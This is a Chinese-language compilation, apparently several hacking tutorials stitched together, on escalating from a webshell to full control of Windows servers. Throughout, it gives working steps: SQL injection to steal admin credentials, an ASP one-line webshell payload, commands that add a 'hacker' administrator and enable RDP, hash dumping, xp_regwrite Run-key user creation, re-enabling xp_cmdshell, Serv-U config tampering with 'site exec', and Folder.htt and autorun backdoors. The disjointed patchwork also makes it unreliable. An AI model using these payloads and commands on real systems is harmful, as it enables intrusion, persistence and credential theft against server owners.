下载文档原格式
MySQL提权之udf提权(获得webshell的情况)什么是udf提权?MySQL提供了⼀个让使⽤者⾃⾏添加新的函数的功能,这种⽤户⾃⾏扩展函数的功能就叫udf。
它的提权原理也⾮常简单!即是利⽤了root ⾼权限,创建带有调⽤cmd的函数的udf.dll动态链接库!这样⼀来我们就可以利⽤ system权限进⾏提权操作了!当我们拿到webshell后,由于中间件,例如,apache使⽤了较低的权限,可能仅仅是个⽹络服务的权限,然后我们就需要进⾏提权,⽽有时候⽬标机器补丁较全,各种系统提权姿势都失效的情况下,可以将⽬光转义到数据库服务上,在Windows下,在较低版本的mysql(<5.6)安装时默认是系统权限。
还有就是很多⼈图⽅便,例如使⽤了各种集成环境,未做安全设置,直接⽤⾼权限账户进⾏站点配置,就可以考虑⽤UDF进⾏提权。
dll⽂件的好处?1.扩展了应⽤程序的特性;2.可以⽤许多种编程语⾔来编写;3.简化了软件项⽬的管理;4.有助于节省内存;5.有助于资源共享;什么是udf库?UDF表⽰的是MySQL中的⽤户⾃定义函数。
这就像在DLL中编写⾃⼰的函数并在MySQL中调⽤它们⼀样。
我们将使⽤“lib_mysqludf_sys_64.dll”DLL 库不同版本的区别:MySql < 4.1:允许⽤户将任何的DLL⽂件⾥⾯的函数注册到MySql⾥。
MySql 4.1-5.0:对⽤来注册的DLL⽂件的位置进⾏了限制,通常我们选择 UDF导出到系统⽬录C:/windows/system32/来跳过限制。
MySql >=5.1:这些DLL只能被放在MySql的plugin⽬录下。
0x01 提权的前提1. 必须是root权限(主要是得创建和抛弃⾃定义函数)2. secure_file_priv=(未写路径)3. 将udf.dll⽂件上传到MySQL的plugin⽬录下(这⾥以MySQL>=5.1为例)0x02 开始提权这⾥以本地为例1.我们这⾥上传了⼀句话,然后⽤菜⼑连接上先判断数据库版本select version();符合MySql>=5.1的情况。
获取webshell后,上传一句话木马,通过中国菜刀连接启动3389服务,添加管理员账户,获取目标主机的权限获取webshell插入一句话木马的方法有很多,不一定是通过sql注入.从中国菜刀连接上靶机后,获取服务器权限的步骤方式都一样Setp 0实验环境操作机:Windows XP目标机:Windows server 2003实验工具:中国菜刀 Pr 御剑 Pangolin 3389本实验要求获取网站的服务器权限.Step 1目录扫描工具:御剑路径:C:\Tools\目录扫描\打开御剑,在域名中输入,开始扫描;在目录列表中查找后台,发现存在/admin双击打开后台登录页面不过用户名和密码都不知道,没关系,进行下一步:获取用户名和密码.Step 2工具:旁注WEB综合检测程序修正版路径:C:\Tools\注入工具\\打开工具,依次点击 SQL注入 -->批量扫描注入点 --> 添加网址 --> 批量分析注入点;出现下面这个对话框说明已经检测完毕;点击OK进行下一步;注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择检测注入;点击检测注入后,主界面从批量扫描注入点转到 SQL注入猜解检测,点击开始检测;检测完毕后,显示可以注入,并列出了数据库类型:Access 数据库;下面开始逐步猜解表名 -->猜解列名--> 猜解内容;点击猜解表名后,在数据库列表中会显示4个表,分别是admin、user、movie和news;选择admin表,点击猜解列名,成功猜解出三个列名id、username和password;勾选username和password,点击猜解内容,右侧列表中成功显示用户名admin,密码469e80d32c0559f8当然密码是MD5加密的,打开本机浏览器,输入,输入刚刚查询到的密文,点击解密;成功找到明文密码:admin888;注入的方法与工具很多,或者也可以这样:在浏览器中打开网站首页,在最新产品中随便选择一个打开注入点太多;复制URL ,使用工具:穿山甲工具:穿山甲Pangolin路径: C:\Tools\注入工具\pangolinPangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具.所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法;打开穿山甲,输入URL,点击绿色三角箭头进行注入操作;点击 Dates 切换到Dates选项卡,点击 Tables 成功猜解出4张表;获取内容的原理同Domain的使用方法一样,猜解表名-->猜解列名-->猜解内容;同样能获取用户名和密码;下一步:登录后台,上传木马;Setp 3打开后台登录页面,输入用户名admin,密码admin888,输入验证码,点击 ENTER 登录后台;久违的后台终于进去了….点击左侧菜单栏中的系统设置管理-->网站信息配置,用修改配置文件的方法获取WebShell;打开相应页面后,将公司名称内容修改为一句话木马"%><%Eval RequestChr35%><%'写一句话木马的时候注意闭合;点击最下面的保存设置按钮;如果插马成功,公司名称内容为空;打开中国菜刀连接一句话木马;工具:中国菜刀路径:C:\Tools\webshell\中国菜刀打开菜刀,右键空白处,选择添加;在地址栏中输入,为什么是这个路径因为我们刚才修改的网站信息配置页面,就是这个路径,可以自己下载一个魅力企业网站管理系统源码看看,2007或2009版的都行,里面的目录结构一目了然;连接密码为,密码为什么是往上看一句话木马,里面有个chr35,的ascii码就是35,当然这个密码可以随便设置,只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可,点击添加;添加成功后会新增一条记录;双击这个URL,成功进入解释一下一句话木马/inc/的源码是这样的:1.<%2.Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码构造一句话木马:1."%><%Eval RequestChr35%><%'复制代码插入一句话木马后,代码会变成这样:1.<%2.Const SiteName=""%><%Eval RequestChr35%><%'" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码代码再整理规范一点就是这样:1.<%Const SiteName=""%>2.<%Eval RequestChr35%>3.<% '" '网站名称4.Const EnSiteName="MSCOM 2007" '网站名称5.Const SiteTitle="魅力软件" '网站标题6.Const EnSiteTitle="MelyySoft" '网站标题7.Const SiteUrl="" '网站地址8.Const Miibeian="湘ICP备05011184号" '网站备案号9.….10.%>复制代码所以插入一句话木马一定要保证整个代码的语法是正确的,否则肯定不成功;下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;Step 4进入C:\RECYCLER目录,准备上传提权工具;当然可写的目录不知这一个,还有其他的;提权工具包括pr,3389,cmd,路径:C:\Tools\提权工具\windows开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;上传成功;提权Windows跟踪注册表项的ACL权限提升漏洞KB952004MS09-012Windows管理规范WMI提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源.WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程.一旦找到了SYSTEM 令牌,就可以获得SYSTEM权限的提升.使用方法:1. "net user hacker 123 /add & net localgroupadministrators hacker /add"复制代码net user hacker 123 /add添加一个用户名为hacker、密码为123的账户;net localgroup administrators hacker /add将账户hacker添加到管理员组;提权有很多种,如巴西烤肉等;下一步,执行提权操作;右键,选择虚拟终端成功进入,将目录切换到C:\RECYCLER用执行cmd命令,添加账户;1.pr "net user hacker 123 /add"复制代码第一次执行命令有可能不成功,怎么办没关系,再执行一次就OK了;账户添加成功,下一步,将hacker账户添加到系统管理员组;1.pr "net localgroup administrators hacker/add"复制代码添加成功,下一步,开启3389;1.pr 3389复制代码如果出现如上图中的一大堆命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机;开始-->运行-->mstsc如果找不见目标IP地址,请点击右上角场景拓扑图进行查看:输入目标IP地址:,开始连接,继续输入用户名hacker和密码123,进入系统;3389连接成功下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 ,还是使用菜刀上传;工具一大堆,随便用,这里我们使用QuarksPwDum,开始上传;上传成功,进入目标机,运行QuarksPwDump注:打开cmd,用命令行启动QuarksPwDump,不要直接双击;运行后,会出现如下界面:继续输入命令:1.QuarksPwDump --dump-hash-local 复制代码执行后的结果如下:成功获取到administrator的hash:62C4700EBB05958F3832C92FC614B7D1:4D4541AACCF6CF33E1 DD9D85暂时切换出实验环境,在你的电脑上打开浏览器输入,在页面的相应位置输入hash,然后GO;ps:如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站点很多;最终结果输出:___________________________________________________ ___________________________________________________ _____________________________________WVSWVS Web Vulnerability Scanner 是一个自动化的Web应用程序安全测试工具.官网:1、WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序.2、它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序.3、除了自动化地扫描可以利用的漏洞,WVS还提供了分析现有通用产品和客户定制产品包括那些依赖于JavaScript的程序即AJAX应用程序的一个强健的解决方案.4、登录保护页面的自动扫描 .一个网站最有可能被攻击和容易受到攻击的区域往往是那些需要用户登录的区域.因此对的Acunetix最新版本现在可以自动地和轻松浏览复杂的验证区域,不再需要经常需要手动干预.这包括可以扫描使用单点登录SSO和基于OAuth认证的Web应用程序.5、检测WP核心和WP插件的漏洞. 可以检测超过1200个WordPress 核心和插件的漏洞,目前全球市场上没有其他扫描器可以检测这么多的WordPress漏洞.WordPress网站已经超过了7400万,在WordPress核心发现一个漏洞,或甚至在某一个插件的漏洞都可用于攻击数百万的个人网站.6、支持各种开发架构和Web服务 .许多企业级,任务关键的应用程序基本都是使用Java框架或Ruby on Rails建立的.第10版经过精心设计,可精确抓取扫描和使用这些技术构建的Web应用程序.另外随着不断上升的HTML5单页面的应用程序和移动应用,Web服务已经成为一个显着的攻击向量.新版本改进了对使用WSDL和WCF描述基于SOAP的Web 服务支持,使用WADL定义自动扫描RESTful Web服务.其“深度扫描”爬行引擎可以非常迅速的分析同时使用Java 框架和Ruby on Rails开发的Web应用程序.7、检测恶意软件和钓鱼网址 Acunetix WVS 10将附带一个URL的恶意软件检测服务,这是用来分析所有的扫描过程中找到的外部链接,针对不断更新的恶意软件和钓鱼网址数据库,这项恶意软件检测服务利用了谷歌和Yandex的安全浏览数据库.8、支持外部第三方工具.如Fiddler、Burp Suite和Selenium IDE,以加强业务逻辑测试和手动测试和自动化的工作流.界面:报告输出:本次实验到此结束。
本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。
因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。
考虑再三,偶还是决定发出来。
此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢把话说满,呵呵,经本人数百次真实“实战演习”,基本上是100%可以拿到webshell 甚至系统权限)。
记得我在《MSSQL db_owner角色注入直接获得系统权限(续)》中写过一种利用xp_regwrite 来取得系统权限的方法:xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','xwq1','REG_SZ','net user xwq xwq /add'xp_regwrite HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq2','REG_SZ','net localgroup administrators xwq /add',只要让网站所在的服务器重起,就能得到系统权限。
经过本人的数百次的真实实验,这种方法不太实用,很容易引起网管的注意,再说ddos也是违法的事(偶可是好人啊),发动一场ddos要花费的大量的人力,物力(看你的肉鸡多少拉)。
所以不太可行(除非是你十分想要搞定的网站)。
呵呵,哆嗦拉那么多,你可能看的已经不耐烦拉,好,这就介绍我的三大必杀技之一————万能提权。
假如一个网站存在sql注射漏洞,如果这个网站是用固定服务器sysadmin权限的用户作的连接(呵呵,通俗点说就是sa,菜鸟可以这样认为),呵呵,想要拿到一个webshell或者是系统权限可以说是易如反掌,轻而易举的事,据我所知,sysadmin权限要拿到webshell或者系统权限不下10种,呵呵,可能更多吧(偶只会10种),sysadmin怎么拿到webshell或者系统权限,我不想多说,想比大家都已经烂熟于心拉,可是要是一个网站是db_owner权限呢?你怎么办,你怎么拿系统权限,怎么拿webshell(没有上传漏洞和数据库备份等功能),大家可能回说backup a shell,我记得LCX也在《MSSQL db_owner角色注入直接获得系统权限》里说过拉“备份得到的shell只是理论化的东东,如果一个webshell有20mb的话,你还能用它吗?”呵呵,要是我告诉你db_owner拿到一个webshell或者是系统权限的方法和sysadmin权限的一样多,你回有什么反映,是不是觉得有点不可思议,或者又是我胡说呢?(不相信的朋友,下面的内容就不要看拉)呵呵,是不是看的心痒痒拉,迫不及待的想知道啊,好,我不在废话拉,这就把我的三大必杀技之一————万能提升权限方法告诉大家。
在webshell提权过程中使用MSSQL的SA账号来提升权限拿服务器是比较有效的方法,但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误提示,无法正常执行系统命令。
很多菜鸟朋友们遇到类似的问题可能就会选择放弃,其实这类问题是很常见的,现在管理员安全意识有所提高,往往对SA账号做了限制,或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除,这个xp_cmdshell就类似于我们的wscript.shell一样了,有时候遇到管理将该组件删除了的我们自己上传cmd也就不能执行了。
但是这类情况我们也可以突破的,下面给大家列出一些实用SA账号执行系统命令出现的各类错误以及修复办法。
针对各类错误我们的修复办法都是给服务器执行SQL命令进行修复,这类给服务器执行SQL 命令我们可以使用一款《SQL查询分析器修正分离版》的软件,远程连接服务器直接执行SQL命令,若服务器是内网环境下的话我们就需要使用webshell自带的功能给服务器执行SQL语句了。
错误1:Error Message:未能找到存储过程 'master..xp_cmdshell'。
修复办法:第一步先删除:drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")错误2:拒绝访问。
修复办法:该类错误一般是在执行系统命令的时候出现,例如执行net user invader 123456 /add 时候发生,该错误是由于管理对net文件作了修改,这类我们可以使用net1,或者使用Dir net.exe /s /p命令查找net.exe的备份文件,找到位置再执行,例如net1 user invader 123456 /add或D:XXXnet.exe user invader 123456 /add。
webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。
MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。
以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。
这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。
2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。
这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。
3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。
这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。
4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。
这可能包括管理员权限或其他高权限。
需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。
此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。
因此,建议仅在合法和授权的情况下使用这些技术。
主讲:危险漫步信息安全系列讲座Webshell提权登陆服务器66 Webshell提权登陆服务器主讲:危险漫步6 Webshell是什么?webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
6 Webshell是什么?“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。
webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。
由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
6 Webshell的作用是什么?webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。
6 Webshell会被入侵者怎样利用?Webshell被入侵者利用,可以达到控制网站服务器的目的。
这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。
6 Webshell长什么样子?是什么?l可能是这样...6 Webshell长什么样子?是什么?l也可能是这样...6 Webshell长什么样子?是什么?l还有可能是这样...6 Webshell提权能获得什么权限Webshell一般是WEB端的最高权限了,如果获得这个权限还不能满足你的需求,那么就需要进行提权了,今天的分享就是要把WEB权限提升至更高的权限,通过3389远程连接的方式登陆服务器。
6。
说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端,管理员为了管理方便也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务器使用最多的就是servu那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写~好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~好的,还是连上了ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //刚才添加的用户331 User name okay, please send complete E-mail address as password. Password:password //密码230 User logged in, proceed.ftp> cd winnt //进入win2k的winnt目录250 Directory changed to /WINNTftp>cd system32 //进入system32目录250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。
常见的提权方法1. 提权方法之一是利用弱密码。
当系统或应用程序使用弱密码进行身份验证时,攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。
2. 通过漏洞利用来提权也是一种常见的方法。
攻击者可以利用系统、应用程序或服务的安全漏洞,通过代码注入、缓冲区溢出等技术来获取提权权限。
3. 通过系统配置错误来提权。
攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。
4. 利用恶意软件进行提权也是一种常见的方法。
攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式,在受害者计算机上运行,并以管理员权限执行特定操作。
5. 通过内核提权也是一种常见的方法。
攻击者可以利用操作系统内核的漏洞,通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。
6. 利用特权升级工具进行提权是另一种常见的方法。
这些工具包括Metasploit、Backtrack、Kali Linux等,它们提供了各种漏洞利用和提权的功能。
7. 利用附加权限漏洞进行提权。
当系统或应用程序授予某些用户或组额外的特权时,攻击者可以利用这些漏洞来获取提权权限。
8. 通过利用网络服务进行提权。
一些网络服务存在软件或配置漏洞,攻击者可以通过这些漏洞利用来获取提权权限。
9. 利用操作系统的弱点进行提权。
操作系统中可能存在一些安全性较弱的功能或配置,攻击者可以利用这些弱点来获取管理员权限。
10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。
他们可能通过欺骗或说服其他用户来获得管理员权限,或者利用钓鱼等技术获取管理员凭据。
最全的WEBSHELL提权方法总结在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。
本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM,破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器支持PHP)c:\PHP(如果服务器支持PHP)运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以用这段代码试提升,好象不是很理想的如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
根目录下隐藏autorun.infC:\PROGRAM FILES\KV2004\ 绑D:\PROGRAM FILES\RISING\RA V\C:\Program Files\Real\RealServer\rarFolder.htt与desktop.ini将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下replace 替换法捆绑脚本编写一个启动/关机脚本重起删SAM :( 错CAcls命令FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bakRing的权限提升21大法!以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。
本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。
希望对朋友有帮助!1.radmin连接法条件是你权限够大,对方连防火墙也没有。
封装个radmin上去,运行,开对方端口,然后radmin上去。
本人从来米成功过。
,端口到是给对方打开了。
2.paanywhereC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去3.SAM破解C:\WINNT\system32\config\ 下他的SAM 破解之4.SU密码夺取C:\Documents and Settings\All Users\「开始」菜单\程序\引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空[USER=WekweN|1]Password=HomeDir=c:\TimeOut=600Maintenance=SystemAccess1=C:\|RWAMELCDPAccess1=d:\|RWAMELCDPAccess1=f:\|RWAMELCDPSKEYvalues=这个用户具有最高权限,然后我们就可以ftp上去quote site exec xxx 来提升权限5.c:\winnt\system32\inetsrv\data\引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行6.SU溢出提权这个网上教程N多不详细讲解了7.运行Csript引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll再将asp.dll加入特权一族asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll""C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了8.脚本提权c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs9.VNC这个是小花的文章HOHO默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password我们可以用vncx4破解它,vncx4使用很简单,只要在命令行下输入c:\>vncx4 -W然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权给对方来个NC 但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上HOHO OK了11.社会工程学之GUEST提权很简单查看他的拥护一般来说看到帐户以后密码尽量猜可能用户密码一样也可能是他QQ号邮箱号手机号尽量看看HOHO12.IPC空连接如果对方真比较白痴的话扫他的IPC 如果运气好还是弱口令13.替换服务这个不用说了吧?个人感觉相当复杂14.autorun .infautorun=xxx.exe 这个=后面自己写HOHO 加上只读、系统、隐藏属性传到哪个盘都可以的不相信他不运行15.desktop.ini与Folder.htt引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义文件夹"(xp好像是不行的)一直下点,默认即可。
完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:<OBJECTID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名"></OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门16.su覆盖提权本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了17.SU转发端口43958这个是Serv -U 的本地管理端口。
FPIPE.exe上传他,执行命令:Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将4444端口映射到43958端口上。
然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了18.SQL帐户密码泄露如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。
format选择xp_cmdshell"%s"即可。
然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了19.asp.dll引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll""C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.20.Magic Winmail前提是你要有个webshell 引用:/forum/read.php?tid=3587这里去看吧21.DBO……其实提升权限的方式很多的就看大家怎么利用了HOHO 加油吧将服务器控制到底!感谢noangelWEBSHELL权限提升动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了一serv-u提升OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。
